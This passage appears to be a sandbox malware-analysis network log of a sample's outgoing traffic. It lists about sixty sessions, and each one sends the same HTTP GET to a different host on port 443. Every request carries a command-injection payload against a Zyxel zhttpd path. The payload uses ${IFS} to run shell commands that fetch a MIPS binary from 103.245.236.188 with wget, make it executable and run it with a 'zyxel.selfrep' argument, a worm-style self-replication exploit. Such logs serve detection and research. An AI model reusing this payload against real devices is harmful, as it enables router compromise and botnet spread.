                                    Jan 13, 2024 19:01:48.609805107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    133192.168.2.135782687.247.223.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.609806061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    134192.168.2.1340642205.150.104.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.609863043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    135192.168.2.1352702113.123.44.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.609895945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    136192.168.2.1341100166.204.194.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.609920979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    137192.168.2.1346476128.139.59.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.609955072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    138192.168.2.135447249.188.190.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610002041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    139192.168.2.1340472200.92.147.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610033989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    140192.168.2.134933098.93.51.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610055923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    141192.168.2.1347838218.91.125.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610104084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    142192.168.2.135524214.82.79.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610140085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    143192.168.2.1352176216.174.240.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610188007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    144192.168.2.13458064.41.69.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610274076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    145192.168.2.1334490100.236.196.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610274076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    146192.168.2.134730236.17.139.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610286951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    147192.168.2.1346492114.214.203.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610327959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    148192.168.2.133471838.37.230.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610395908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    149192.168.2.1355640159.54.125.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610415936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    150192.168.2.1358076144.251.185.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610430002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    151192.168.2.1346324189.76.132.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610497952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    152192.168.2.1344388194.10.7.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610502958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    153192.168.2.135130414.63.44.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610562086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    154192.168.2.1359392101.213.248.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610616922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    155192.168.2.1355518129.165.24.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610635042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    156192.168.2.1347440153.167.18.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610675097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    157192.168.2.135243213.244.137.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610723972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    158192.168.2.1350232123.121.183.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610749960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    159192.168.2.135259627.21.74.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610822916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    160192.168.2.1334976174.100.85.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610856056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    161192.168.2.134347652.130.246.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610887051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    162192.168.2.1352140154.141.9.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610913038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    163192.168.2.1342592166.27.207.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.610981941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    164192.168.2.134427813.14.28.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.611022949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    165192.168.2.1333276147.116.189.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.611068010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    166192.168.2.1344878178.3.224.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.611068964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    167192.168.2.1337116122.95.123.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.611150026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    168192.168.2.1354636171.136.97.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.611238003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    169192.168.2.133315247.93.173.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.611273050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    170192.168.2.1346880198.87.124.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.611304998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    171192.168.2.1357978132.162.157.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.611351967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    172192.168.2.1355400156.22.59.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.611377954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    173192.168.2.133389257.93.241.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.611455917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    174192.168.2.1345088115.251.163.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.611506939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    175192.168.2.136046269.34.82.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.611541033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    176192.168.2.135575049.99.61.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.611609936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    177192.168.2.1344546117.169.251.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.611610889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    178192.168.2.1356046208.21.218.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.611630917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    179192.168.2.134446881.37.107.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.611653090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    180192.168.2.1335770186.139.74.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.611700058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    181192.168.2.1348142125.2.63.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.611742973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    182192.168.2.1337098221.200.100.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.611774921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    183192.168.2.133714276.89.49.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.611813068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    184192.168.2.1350962204.223.19.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.611846924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    185192.168.2.1345432191.178.199.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.611907959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    186192.168.2.1343690177.30.65.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.611924887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    187192.168.2.1342224142.84.201.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.612801075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    188192.168.2.1334464179.8.67.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.612828970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    189192.168.2.134515266.4.60.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.612977982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    190192.168.2.13348824.51.248.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.613035917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    191192.168.2.1351074157.95.102.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.613054991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    192192.168.2.1360086221.161.109.246443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.613208055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    193192.168.2.133734491.104.26.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.613245964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    194192.168.2.1334842142.175.97.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.613295078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    195192.168.2.1347688170.92.183.2443
                                    TimestampBytes transferredDirectionData
